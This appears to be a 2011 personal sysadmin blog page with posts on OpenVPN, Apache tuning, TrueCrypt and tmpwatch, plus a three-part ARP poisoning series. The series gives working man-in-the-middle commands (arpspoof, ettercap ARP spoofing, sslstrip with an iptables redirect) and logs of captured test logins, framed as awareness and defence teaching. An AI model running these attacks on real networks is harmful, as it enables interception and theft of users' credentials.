Dec 31, 2011

Secure remote access to home through OpenVPN (I)

I have prepared a secure access so that when I am living in London, I can connect to my home network securely. I have set up a VPN (Virtual Private Network) by means of OpenVPN.

Why have I preferred a VPN instead of a typical access such as SSH, VNC, etc.? Because in this way, I will be able to accomplish an encrypted tunnel between my laptop and home network, and over that secure line, to establish other types of connections later. Furthermore, I will be able to connect from any kind of insecure networks.

Why have I chosen OpenVPN? Because this application allows you to quickly build SSL/TLS channels, and this sort of VPN is really handy and straightforward to configure. OpenVPN is an open source software which easily implements VPNs over a public network, such as Internet. One of the main advantages of OpenVPN is that it just needs a single TCP or UDP port for transmissions and runs in userspace, rather than requiring IP stack operations, as for instance IPSec or PPTP.

Bellow you can observe a detailed outline of my infraestructure. It is a point to point link between my laptop and a PC connected inside the local network. The PC acts in the server role (takes care of listening for possible connection requests) and the laptop is the client (initiates the connection). Once I am connected to the PC via OpenVPN, I will be able to jump safely to any device located in the network. Both computers run Ubuntu 11.10.




One of the first things that I had to face up to is the issue of the dynamic IP address used by my ADSL service. Every time that I turn on the router, a temporary public IP address is assigned by the ADSL provider. To overcome it, I have signed up for a free dynamic DNS service: DNSdynamic. The registration process is pretty simple.

In this manner, I have obtained a subdomain which points to my router. To that end, I have installed ddclient on the PC, an address updating utility which keeps up to date the current public IP of the router. In order to show you my configuration, I will use a fictitious subdomain called test.dnsdynamic.com.

root@javi-pc:~# aptitude install ddclient

root@javi-pc:~# cat /etc/ddclient.conf
# Log messages to syslog
syslog=yes              

# Support SSL updates               
ssl=yes

# Obtain IP address from provider's IP by checking page                               
use=web, web=myip.dnsdynamic.com

# Update DNS information from server
server=www.dnsdynamic.org

# Login and password for server
login=test@gmail.com
password='xxxxxx'

# Update protocol used              
protocol=dyndns2

# Subdomain                        
test.dnsdynamic.com

root@javi-pc:~# cat /etc/default/ddclient 
...
# ddclient runs in daemon mode
run_daemon="true"

# Time interval between the updates of the dynamic DNS name (in seconds)
daemon_interval="3600"

root@javi-pc:~# /etc/init.d/ddclient start

The SSL/TLS connection configured by me is authenticated through digital certificates. So I have needed to make a couple of certificates, one for each end of the VPN tunnel. In addition, I have also had to create a CA (Certification Authority) in order to validate both certificates. OpenVPN allows peers to authenticate each other by using username/password, a pre-shared secret key or digital certificates. I have picked out the last option due to it is the most robust system.

So as to manage digital certificates, I am used to treating with easy-rsa, a small RSA key management package which contains a series of openssl scripts aimed at handling PKIs (Public Key Infrastructures). This tool is included within the OpenVPN source file.

javi@javi-pc:~/tmp$ wget http://swupdate.openvpn.org/community/releases/openvpn-2.2.2.tar.gz

javi@javi-pc:~/tmp$ tar xvzf openvpn-2.2.2.tar.gz

javi@javi-pc:~/tmp$ mv openvpn-2.2.2/easy-rsa/2.0/ . ; rm -rf openvpn-2.2.2*


Dec 22, 2011

Apache performance tuning: dynamic modules (II)

Let's continue with the second part of the article titled Apache Performance tuning: dynamic modules (I). Remember that this paper is aimed at reviewing the different modules belonging to Apache, so as to determine whether they are useful for our requirements. To that end, we will be able to fit the amount of memory used by Apache processes.

The most important point is to be aware of that one only process consumes little memory, but if our Apache installation requires lots of processes, the total memory grabbed by Apache will be huge. So if we get hold of turning down the initial memory with which a process is created, afterwards it will run lighter and besides, we will have that free memory available in order to be allocated for other things.

mod_ext_filter

Forwards the response body to an external program before sending it out to the client.

# LoadModule ext_filter_module modules/mod_ext_filter.so

mod_include

Filters files before delivering them to the client.

# LoadModule include_module modules/mod_include.so

mod_info

Provides a comprehensive overview of the web server configuration.

# LoadModule info_module modules/mod_info.so

mod_ldap

Improves the performance of websites by pooling LDAP connections and caching responses.

# LoadModule ldap_module modules/mod_ldap.so

mod_logio

Logs the input and output number of bytes received/sent per request.

# LoadModule logio_module modules/mod_logio.so

mod_proxy

Puts into action a a proxy/gateway.

# LoadModule proxy_module modules/mod_proxy.so
# LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
# LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
# LoadModule proxy_http_module modules/mod_proxy_http.so
# LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
# LoadModule proxy_connect_module modules/mod_proxy_connect.so

mod speling

Tries to correct erroneous URLs that users could have typed by overlooking capitalization and allowing up to one misspelling.

# LoadModule speling_module modules/mod_speling.so

mod_status

Provides statistics about the activity and performance of the web server.

# LoadModule status_module modules/mod_status.so

mod_suexec

Allows CGI scripts to run as a concrete user and group.

# LoadModule suexec_module modules/mod_suexec.so

mod_userdir

Allows user directories can be accessed through the web server.

# LoadModule userdir_module modules/mod_userdir.so

mod_usertrack

Logs user activity.

# LoadModule usertrack_module modules/mod_usertrack.so

After disabling these modules, the memory used by one Apache process (and owned by apache user) went from 2.02 to 1.46 MB, that is to say, we have gained around 0.6 MB. If you take into account that a large number of processes can be running on the system at any given time, the saved memory might be appreciable. In addition, you have to consider that from now on, a process is much lighter, with what its startup and performance will be much better.


Dec 14, 2011

Apache performance tuning: dynamic modules (I)

Apache is a cross-platform, modular and open source web server, widely used around the world for its quality, robustness and stability. But like most of the applications, it is installed with a default configuration which is not the most adequate. And I am going to say more: I have never seen an Apache installation where the administrator has set it up correctly later.

During several articles, you are going to learn how to properly optimize Apache, in order to achieve the best performance. The tests will be carried out on CentOS 6.2 (32 bits) with Apache 2.2.15. I am going to break up this first article relative to dynamic modules in two separate parts.

Apache has got two main operating modes, also known as multi-processing modules (MPMs):

  • Prefork: an unique Apache process (httpd) launchs child processes which take care of listening for potential connections and serving them. Apache keeps several idle processes ready to attend incoming requests. Thereby, a client does not need to wait for new children are forked. Another advantage of this operation mode is that if there is a problem in any process, this will not affect other processes (each child is independent of the rest). 

  • Worker: as in the previous case, an only control process creates several child processes, and in turn, each child process handles a listener thread which passes the inbound connections to other server threads managed as well by the same child process. This mode is faster and more scalable, but in contrast, it is more fault tolerant (several threads share the same memory area, and if there is any problem in the parent, it will involve the rest).

You can install Apache either by compiling it from its source code or by getting directly the binary file from a repository. I for one prefer this second option, because in this way, any kind of update (security or bugfix) will be able to be applied without compiling it again.

A typical installation of Apache via yum comes with the following pre-compiled modules. As you may appreciate, prefork will be the default operating mode (you can change this by modifying the /etc/sysconfig/httpd file).

[root@centos ~]# httpd -l
Compiled in modules:
  core.c
  prefork.c
  http_core.c
  mod_so.c

It is basic to know the funcionality of each module so as to figure out if it can be left out. Then we are going to put forward what modules can be ruled out in the most of the cases. Also point out that all directives showed below, are included into the Apache configuration file (httpd.conf). In many cases, the related modules will be also disabled, aside from the principal one.

mod_actions

Allows the execution of CGI scripts based on the MIME content type and the request method.

# LoadModule actions_module modules/mod_actions.so

mod_auth_basic

Limits access to certain users by using HTTP Basic Authentication. I usually disable its dependencies.

LoadModule auth_basic_module modules/mod_auth_basic.so
# LoadModule authn_file_module modules/mod_authn_file.so
# LoadModule authn_alias_module modules/mod_authn_alias.so
# LoadModule authn_anon_module modules/mod_authn_anon.so
# LoadModule authn_dbm_module modules/mod_authn_dbm.so
# LoadModule authn_default_module modules/mod_authn_default.so
# LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
# LoadModule authn_dbd_module modules/mod_authn_dbd.so

mod_auth_digest

Limits access to certain users by using MD5 Digest Authentication.

# LoadModule auth_digest_module modules/mod_auth_digest.so

mod_authz_*

Limits access to certain groups based on different origins (DBM or plaintext files, hostname or IP address, etc.). I get used to remove all less mod_authz_host.

LoadModule authz_host_module modules/mod_authz_host.so
# LoadModule authz_user_module modules/mod_authz_user.so
# LoadModule authz_owner_module modules/mod_authz_owner.so
# LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
# LoadModule authz_dbm_module modules/mod_authz_dbm.so
# LoadModule authz_default_module modules/mod_authz_default.so

mod_cache

Manages the content cache.

# LoadModule cache_module modules/mod_cache.so
# LoadModule disk_cache_module modules/mod_disk_cache.so

mod_cgi

Allows the execution of CGI scripts.

# LoadModule cgi_module modules/mod_cgi.so

mod_dav

Implements the WebDAV (Web-based Distributed Authoring and Versioning) funcionality.

# LoadModule dav_module modules/mod_dav.so
# LoadModule dav_fs_module modules/mod_dav_fs.so

mod_env

Controls the internal environment variables which are sent out to CGI scripts and SSI pages.

# LoadModule env_module modules/mod_env.so


Dec 5, 2011

I head off to London

Last year, when I was in London, I already knew that it was not going to be the last time, and indeed, I was not mistaken. Today, I have handed in my resignation and I have given up my current job, where I will be bound until the end of this month. My flight to the United Kingdom, the next stage of my life, will take off on the 9th of January.

This idea was going around in my head from a long time. And the question was: why not? Why not work in another country, run away from the daily monotony, learn from other cultures, break the political correctness and in short, squeeze the life.

Here in Spain we have a big problem and its name is PSOE (political party). Whenever they have governed, they have finished messing up the country, and nowadays, in contradistinction to 1996 (the previous time that they ruined us), we do not dispose of the European cohesion funds and the crown jewels (the most important public companies) to be sold, in order to be able to get ahead. I could write another book about the misdeeds of these political figures...

Spain has to face up to a hard situation throughout next years, and this is other of the reasons because I think that now is a good moment to go abroad. Unlike fifteen years ago, The Bank of Spain cannot devalue the currency at present and we will have to resort to other financial instruments so as to get over this critical condition, such as reducing salaries, increasing taxes, improving the productivity, optimizing public resources, etc., and in this way, to be more competitive and efficient.

Regarding the IT world, I have always said that Spain is not a good place for engineers, due to this is a country of services. We do not have IT industry and in the most of the cases, you can only aspire to cover the needs or requirements of a client. And why do I say client and not company? Because over time, the business model has totally changed and at the present time, it is no longer possible (or at least very complicated) to belong to a final company.

Between the client and you, there will always be an intermediate company that we call "cárnica" or "charcutera" (butcher shop in English). Thereby, in general, this intermediary takes care of obtaining a final client for you, offering you like a bit of meat, and paying your salary. Practically without lifting a finger and taking advantage of your work, it will grab a part of the money that you make every month.

What happens with this system? You will never be or feel part of a company; today you can be working in a certain place and tomorrow, in another one, and on top of all that, there is no way to develop a career inside an enterprise.

I recently read the article titled "Las ilusiones perdidas" (the lost illusions in English), which reflects perfectly the situation of thousand of Spanish who have had to leave our country because of multiple reasons, but mainly due to a lack of future. This is a great issue, because during the next years, we are going to lose the best generation of young people better prepared in history. This paradox is also known as brain drain.

As I mentioned before, my case is totally different. I am not in need to look for a job far away from home; I have a permanent job here and I have dropped it off voluntarily. Furthermore, I am aware of that I might have switched to another work at any moment. Simply, I am just in the mood for taking this step.

I am a person who likes to work out everything in detail, and in this manner, I have mapped out a complete roadmap for my first weeks in London. I have to read up some points before ending up my plan, but mostly, I am going to boost my English at the beginning, by enrolling in some language school, at least during the first three months. I know that I have a good English level, but I also realize that it is turned into lower-intermediate when you arrive there.

After that initial period of time, I will search for a job. I consider that it is better to build the house starting with the floor rather than the roof. For that reason and as I pointed out before, first of all I will be enhancing my English and in turn, I will have free time to get used to those new lands, aside from to accomplish other typical tasks such as opening a bank account, getting the NIN (National Insurance Number) and a GP (General Practitioner), registering at the embassy and so on.

Perhaps, this is the most important decision that I have had to take on throughout my life, and I hope not to slip up. I am aware of that it will not be straightforward, but at any rate, I am really looking forward to it!


Nov 29, 2011

The tmp directory and tmpwatch daemon

The tmp directory is normally used on Linux systems so that users or applications can store temporary information within it.

On Debian or Ubuntu distributions, the system cleans out all user data with each startup. On RHEL or CentOS 6, no operation is performed on that directory. But in version 5 of RHEL or CentOS, there was a great tool installed on the system by default, and utilized to periodically check the contents of the tmp directory: tmpwatch.

Tmpwatch is a cron job which takes care of removing files which have not been accessed for a period of time, or any file or folder that you configure. This operation is carried out based on guidelines which will be exposed later. The equivalent program on Debian/Ubuntu is tmpreaper, although you can compile tmpwatch perfectly for the aforementioned operating systems.

For the development of the present article, I am going to use CentOS 6.0 (32 bits).

[root@centos ~]# yum install tmpwatch

[root@centos ~]# cat /etc/cron.daily/tmpwatch 
#! /bin/sh
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
        -x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
        -X '/tmp/hsperfdata_*' 10d /tmp
/usr/sbin/tmpwatch "$flags" 30d /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch "$flags" -f 30d "$d"
    fi
done

By taking a look at the script launched daily by the system, we may observe that tmpwatch acts on a series of directories (/tmp, /var/tmp, /var/local, etc.) by clearing out their contents. This task is accomplished based on certain events which have taken place throughout the last 10 or 30 days.

  • -u (--atime): the decision to delete a file depends on its atime (access time).
  • -m (--mtime): the decision to delete a file depends on its mtime (modification time).
  • -c (--ctime): the decision to delete a file depends on its ctime (inode change time).
  • -f (--force): removes files even whether root does not have write access.

By means of the '-x' option, we can leave out a specific file or directory that matches the pattern.


Nov 22, 2011

TrueCrypt under the command line

I have an external hard drive (LG XD3, 500 GB) broken up into a couple of partitions, 450 and 50 GB respectively. The first partition is public and formatted with NTFS. The second one is formatted with ext4 and encrypted by means of TrueCrypt, and it is where I store my private data.

So far, I used TrueCrypt into graphical mode, but over time, I realize that it is more comfortable to handle the command line version (aside from I tend to rule out any kind of graphical tool whenever possible).

TrueCrypt is a powerful program which may cypher partitions, logical volumes, whole hard drives or even installed operating systems. The encryption is transparently and automatically carried out, and on top of all that, on real time (that is to say, on the fly). Another plus is the option to hide volumes and its performance, which is excellent.

One practical detail of TrueCrypt is that is not necessary to install it on the system. To that end, you have to download the Console-only-32-bit file (in my case, the 32-bit version), decompress the included binary and run it. Then, you will have to choose the second option: Extract package file truecrypt_7.1_console_i386.tar.gz and place it to /tmp. Within this tgz file is located the executable file of TrueCrypt.

I get used to drop off this binary file into the public partition of the external hard drive. Thereby, when I have to use it, I just have to get it from there.

javi@javi-ubuntu:/tmp$ cp /media/public/truecrypt/truecrypt . ; chmod +x truecrypt

javi@javi-ubuntu:/tmp$ ./truecrypt --version
TrueCrypt 7.1

First of all, I had to encrypt the partition. This is a long process and depends on the size of your partition. Below you may appreciate that the average speed was 26 MB/s.

In the next output, you can see that in order to create the cyphered partition (sdb2), I followed the text wizard provided by TrueCrypt. Other choice would have been to pass the parameters through the command line (--encryption, --size, etc.).

javi@javi-ubuntu:/tmp$ sudo ./truecrypt -c
Volume type:
 1) Normal
 2) Hidden
Select [1]: 1

Enter volume path: /dev/sdb2

Encryption algorithm:
 1) AES
 2) Serpent
 3) Twofish
 4) AES-Twofish
 5) AES-Twofish-Serpent
 6) Serpent-AES
 7) Serpent-Twofish-AES
 8) Twofish-Serpent
Select [1]: 1

Hash algorithm:
 1) RIPEMD-160
 2) SHA-512
 3) Whirlpool
Select [1]: 1

Filesystem:
 1) None
 2) FAT
 3) Linux Ext2
 4) Linux Ext3
 5) Linux Ext4
Select [2]: 5

Enter password: 
Re-enter password: 

Enter keyfile path [none]: 

Please type at least 320 randomly chosen characters and then press Enter:


Done: 100.000%  Speed:   26 MB/s  Left: 0 s                

The TrueCrypt volume has been successfully created.

Once you have created the encrypted partition (remember that my example is based on a partition, but you can also cypher a file or logical volume), the procedure is pretty easy. When you want to work with that safe area, you only have to mount it by means of TrueCrypt.

javi@javi-ubuntu:/tmp$ mkdir /mnt/truecrypt

javi@javi-ubuntu:/tmp$ sudo ./truecrypt /dev/sdb2 /mnt/truecrypt
Enter password for /dev/sdb2: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

javi@javi-ubuntu:/tmp$ ./truecrypt --list
1: /dev/sdb2 /dev/mapper/truecrypt1 /mnt/truecrypt

By running the following command, you may collect more details about a mounted volume.

javi@javi-ubuntu:/tmp$ ./truecrypt --volume-properties /dev/sdb2
Slot: 1
Volume: /dev/sdb2
Virtual Device: /dev/mapper/truecrypt1
Mount Directory: /mnt/truecrypt
Size: 50.0 GB
Type: Normal
Read-Only: No
Hidden Volume Protected: No
Encryption Algorithm: AES
Primary Key Size: 256 bits
Secondary Key Size (XTS Mode): 256 bits
Block Size: 128 bits
Mode of Operation: XTS
PKCS-5 PRF: HMAC-RIPEMD-160
Volume Format Version: 2
Embedded Backup Header: Yes

You can dismount it by executing the next order.

javi@javi-ubuntu:/tmp$ sudo ./truecrypt --dismount /mnt/truecrypt

TrueCrypt has got many more options through the command line. I invite you to take a look at them by checking its help.

And finally, I would like to conclude this article by writing down the order (based on rsync) that I usually run to back up my data into the private partiton.

javi@javi-ubuntu:~$ rsync -altgvb --delete /data /mnt/truecrypt/


Nov 15, 2011

ARP poisoning (III)

During the first article about ARP poisoning (I), we learnt the danger of connecting to a service by using a non-secure protocol, such as HTTP, FTP, SMTP and so on. The username and password are passed down in clear, and anyone could sniff them.

Ok, that's right, so we have to use safe protocols (HTTPS, SSH, FTPS, etc.). But what occurs whether the digital certificate utilized to authenticate and encrypt the communication is changed on the fly? That is just what we studied in the second article about ARP poisoning (II). The bottom line was that we always have to pay attention when we load a webpage and, we must only accept a trusted certificate.

What would happen if one day we are a little bit asleep and we do not realize that we are using HTTP rather than HTTPS? What? How is it possible that I am logging in to my bank account and that access is not provided through HTTPS? Well you should believe it.

Bellow you can look into the normal login in the Oracle website, both Firefox and Google Chrome. You may observe that both accesses are correctly served by means of HTTPS.




Imagine for a moment that an intruder carries out a poisoning attack between you and the router, in order to intercept all data transmitted. Then, he sets up a tool like sslstrip to establish two TCP communications. On the one hand, a first HTTPS connection between him and the Oracle web, by using the real certificate offered by Oracle, and on the other, a second HTTP connection between him and you. This is the target of sslstrip, to take advantage of a Man in the Middle attack (MitM) for tapping SSL/TLS conversations.

root@attacker:~# aptitude install sslstrip

root@attacker:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000

root@attacker:~# sslstrip -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

After running ettercap and forwarding all HTTP traffic to port 10000 (default port used by sslstrip), if the victim tries to open the aforementioned HTTPS Oracle web page, it will turn up the HTTP version of the site (sslstrip takes care of transforming the preceding content sent out by Oracle and serves it to the victim through a HTTP session).

The following figures show the manipulated web page created by sslstrip.




If the victim attempts to sign in, the credentials will be catched by the attacker.

root@attacker:~# cat victim.log
...
2011-11-05 19:51:47,876 POST Data (login.oracle.com):
...
AD91DC75E382F4E9ACDC66D839F095558488AA1754EB29D4513F832B83CB31BF05DB93ACCC18255184E5296825625A56EA6&locale=&ssousername=test%40mytest.com&password=test2

Ok, perfect, so to get out of this kind of attack, first of all, we must have a good cup of coffe every morning, ;-), and second, to be very careful when we surf the Internet. At any rate, as commented in the first post, the end of this series of articles is to present later a great tool which will help us to shut out this sort of problems.

Carrying on with sslstrip, it still holds a last trick: to be able to draw a padlock icon in the navigation bar.

root@attacker:~# sslstrip -f -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

You can take a look at it in both browsers.




It is very important to underline the risks of this type of attack. You could check it out with hundreds of websites (banks, e-commerce, sports betting, etc.) and in the most of them, you could be spoofed. But I have also seen that there are other webs such as PayPal, where the altered web page does not work out very well.


Nov 8, 2011

Ubuntu Server instead of CentOS?

Although both are outstanding Linux distributions, nowadays I choose Ubuntu Server. For a long time, I have prefered CentOS rather than Ubuntu Server, but today, I always install Ubuntu Server unless there is some requirement which forces me to do the opposite (for instance, when some application just is supported for CentOS/RHEL).

I am not going to focus on certain details such as the performance, architecture, support and so on. I only want to talk about those simple things that, when I finish the installation of an operating system, I usually say: I like it!

For my tests, I am going to use two similar versions: Ubuntu Server 10.04 LTS and CentOS 6.0, both 32 bits. After the initial installation (and their corresponding upgrades), here you are a typical view of the system status. As you can distinguish, Ubuntu Server grabs little memory, since the most of it is cached. In respect of the number of active processes, it also has got fewer than CentOS.

root@ubuntu-server:~# top
top - 12:17:54 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  78 total,   1 running,  77 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2061260k total,   126644k used,  1934616k free,    17088k buffers
Swap:   565240k total,        0k used,   565240k free,    87796k cached
...

[root@centos ~]# top
top - 12:17:49 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  84 total,   1 running,  83 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2071620k total,    99020k used,  1972600k free,     5272k buffers
Swap:  4161528k total,        0k used,  4161528k free,    29488k cached
...

What about the initial space taken up for the installation? (In order to get a more accurate result, I have cleaned the package cache). As you can see, CentOS occupies around 225 MB less than Ubuntu Server. I have to highlight this point, because this aspect has improved a lot on CentOS 6.0, since we have now a version of minimal installation. With CentOS 5, the final size was bigger.

root@ubuntu-server:~# aptitude clean

root@ubuntu-server:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/ubuntu--server-root
                       12G  888M  9.6G   9% /
none                 1002M  172K 1002M   1% /dev
none                 1007M     0 1007M   0% /dev/shm
none                 1007M   32K 1007M   1% /var/run
none                 1007M     0 1007M   0% /var/lock
none                 1007M     0 1007M   0% /lib/init/rw
/dev/sda1             228M   31M  185M  15% /boot

[root@centos ~]# yum clean all

[root@centos ~]# df -h
S.ficheros            Size  Used Avail Use% Montado en
/dev/mapper/vg_centos-lv_root
                      7,5G  664M  6,4G  10% /
tmpfs                1012M     0 1012M   0% /dev/shm
/dev/sda1             485M   56M  404M  13% /boot

This situation is reflected as well when we take a look at the number of packages installed on the system.

root@ubuntu-server:~# dpkg -l | grep ii | wc -l
358

[root@centos ~]# yum list installed | wc -l
234

Let's move on to the services which are listening on the system at the beginning. You may appreciate that the picture of Ubuntu Server is impeccable. There is no process bound to any port (aside from SSH). But what happens with CentOS? There are different applications which have already been started up (TCP and UDP). This is a waste of time for me, because at the end of each CentOS installation, I have to remove them.

root@ubuntu-server:~# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      810/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      810/sshd 

[root@centos ~]# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1071/rpcbind        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1191/sshd           
tcp        0      0 0.0.0.0:44568               0.0.0.0:*                   LISTEN      1089/rpc.statd      
tcp        0      0 :::111                      :::*                        LISTEN      1071/rpcbind        
tcp        0      0 :::55445                    :::*                        LISTEN      1089/rpc.statd      
tcp        0      0 :::22                       :::*                        LISTEN      1191/sshd           
udp        0      0 0.0.0.0:822                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 0.0.0.0:841                 0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:45143               0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 :::822                      :::*                                    1071/rpcbind        
udp        0      0 :::43338                    :::*                                    1089/rpc.statd      
udp        0      0 :::111                      :::*                                    1071/rpcbind 

Regarding the repositories provided for each distribution, Ubuntu Server supplies a larger number of packages than CentOS, and this is another plus. Although you can add excelent additional repositories such as EPEL, those extra packages are not officialy supported.

root@ubuntu-server:~# apt-cache stats | grep Normal
  Normal packages: 30299

[root@centos ~]# yum list all | wc -l
4595

Also point out the life cycle of each distribution. On Ubuntu Server you have got a LTS (Long Term Support) version each three years. In contrast, on CentOS, the first release of the branch 5 was shipped in March 2007 and CentOS 6.0, in July 2011 (more than four years after). What goes on with this? Over time, you have to use an operating system where the most of the packages, although still supported, are obsoleted.

And finally, I have metered the time spent in order to reboot the system (both use Upstart). This parameter is really important, mainly in production environments. I have obtained 20 seconds on Ubuntu Server and 40 on CentOS.


Nov 2, 2011

ARP poisoning (II)

During the last article, ARP poisoning (I), you were able to learn the risks of using non-secure protocols inside an unreliable network. At any moment, your connection credentials can be captured by any intruder and you will not be aware of that. Note that this situation can be very common when you surf the Internet and go to HTTP websites, or for example, when you log into your MSN account.

So what happens with secure protocols such as HTTPS? That is to say, for instance when you access your online bank account, PayPal, Gmail, LinkedIn and so on. Are you safe? In most cases, that will depend on you.

Let's go over the normal behavior of a secure site like Facebook. If you click with the left mouse button on facebook.com (in the web browser bar, once you have opened the site), you will be able to appreciate that the connection to the web is encrypted and verified by DigiCert Inc (certification authority).




By pressing on the More Information button, you may take a look at the features of the digital certificate offered by Facebook. As you can pick out in the first screen, the certificate has been issued by DigiCert Inc to Facebook, and in the second one, it is made up by a valid Certificate Hierarchy.




Now we are going to use another audit tool: Ettercap (NG-0.7.3). This program is aimed at sniffing switched LANs, by supporting active and passive analysis of many protocols (HTTP, FTP, POP, IMAP, NFS, etc.), even ciphered ones.

In addition, it includes many options for network and host inspection, data injection in an established connection, lots of loadable modules at runtime, also known as plugins (arp_cop - report suspicious ARP activity -, dos_attack - run a DoS against a victim -, finger - fingerprint a remote host -, etc.), several MitM attacks (ARP poisoning, ICMP redirection, DHCP spoofing and port stealing) and so on.

The victim computer is going to open Facebook (HTTPS) through a web browser (Firefox). Therefore, the victim will go out across the router so as to reach Facebook via Internet.

Ettercap will be utilized in order to poison both elements, victim and router, to sniff all traffic between them. So how can the attacker capture the password, whether this one is sent out through the secure channel previously set up? First up, the traffic between the victim and Facebook is not going directly to the router, but that it will pass through the attacker, which will be picking up all data.

Thereby, on the one hand the attacker will establish an HTTPS connection between itself and Facebook by using the correct certificate issued by Facebook, and on the other, another HTTPS connection between itself and the victim, but this time, by means of a fake certificate created on the fly and which will have all fields filled according to the real certificate presented by Facebook.

Let's get started by editing the configuration file of Ettercap, in order to enable the iptables command to allow the TCP redirection at kernel level, so as to be able to handle SSL dissection.

root@attacker:~# aptitude install ettercap

root@attacker:~# cat /etc/etter.conf
...
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
...
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
...

Now we are ready to run Ettercap by spoofing both targets and activating the ARP poisoning MitM attack. The 'remote' parameter is set in order to capture the connections which pass through the router, otherwise just the connections between them would be catched.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:20:9F:9B      192.168.1.20     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.1 00:60:B3:50:AB:45

 GROUP 2 : 192.168.1.10 00:0C:29:69:81:47
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


At this moment, if you open Facebook again, Firefox will warn you that it cannot confirm that the connection is secure. Normally, when you try to connect securely, sites such as banks, stores, public organisms, etc., present trusted identifications to prove that you are going to the right place.




If you confirm the security exception and accept the digital certificate, you will have fallen into the trap of the attacker. Let's review the characteristics of this invalid certificate, so as to be able to compare it with the real certificate (second figure).




As you can make out in the general features of the fake certificate, only the fingerprints are modified, because of the attacker has signed it with him private key. Besides, the undependable certificate does not present a correct hierarchy.

Now if you attempt to login into Facebook, your credentials will be catched by the attacker.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.171.224.39:443 -> USER: test@mytest.com  PASS: test1  INFO: https://www.facebook.com/


Oct 26, 2011

ARP poisoning (I)

From a long time, I wanted to write some article about this issue. I think that people are not aware of the potential risks when they connect to a public network, such as inside an airport, library, pub and so on, even the own office network.

Many times I have heard: it is not not such a big deal, you know what? I have a good antivirus which protects my computer! And on top of all that, the Windows firewall is activated! At that moment is when I put poker face...

Most of the administrators think that by having a well-configured firewall, an IDS, an antivirus, etc., is enough to shield the network from external threats, but it turns out that around 70 or 80 percent of all attacks come from the own internal network.

Please, note that the things which I am going to explain throughout these articles, can be a cause of crime, so you will be the last responsible if you put them into action with bad intentions. The reason because I want to tell this is, on the one hand, due to it is good that you know the danger of connecting to an unreliable network, and on the other, because I will take advantage of this in order to show you how to avoid it.

To begin with, let's get started by saying how ARP works (Address Resolution Protocol). Basically, this protocol is used to associate MAC and IP addresses.

For example, one computer wants to know the MAC address of a router. In this case, that computer gives off a message to the network by asking who has the IP address of that router (ARP request). Then, only the router responds to the computer with its MAC address (ARP reply).

Hereafter, the computer stores into its MAC table (temporary) the IP and MAC address of the router. ARP poisoning, as its name suggests, is to manipulate the MAC table of the victim by injecting fake ARP packets.

What kind of attacks can derive from this situation? For instance, the well-known Man in the Middle attack (MitM).

Below you can see the environment which I will hold for my tests. Victim and attacker are an Ubuntu 10.11, and ubuntu-server is an Ubuntu Server 11.10 release.


In my first case, I am going to put the attacker computer intercepting all communications between ubuntu-server and victim. To be more precise, the victim will connect to a FTP service installed on ubuntu-server and the attacker will try to capture the password. Remember this sort of protocol, also such as HTTP, SMTP, POP3, etc., the credentials are passed down in clear.

So that the attacker node can work as a tranparent bridge, the IP forwarding must be enabled on it. Furthermore, we have to install the dsniff package which contains the arpspoof tool, program that will be used to poison both computers (client and server).

root@attacker:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@attacker:~# aptitude install dsniff

Let's take a look at their ARP tables before modifying them. As you may appreciate, both computers have registered the correct MAC addresses.

javi@ubuntu-server:~$ arp -a
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
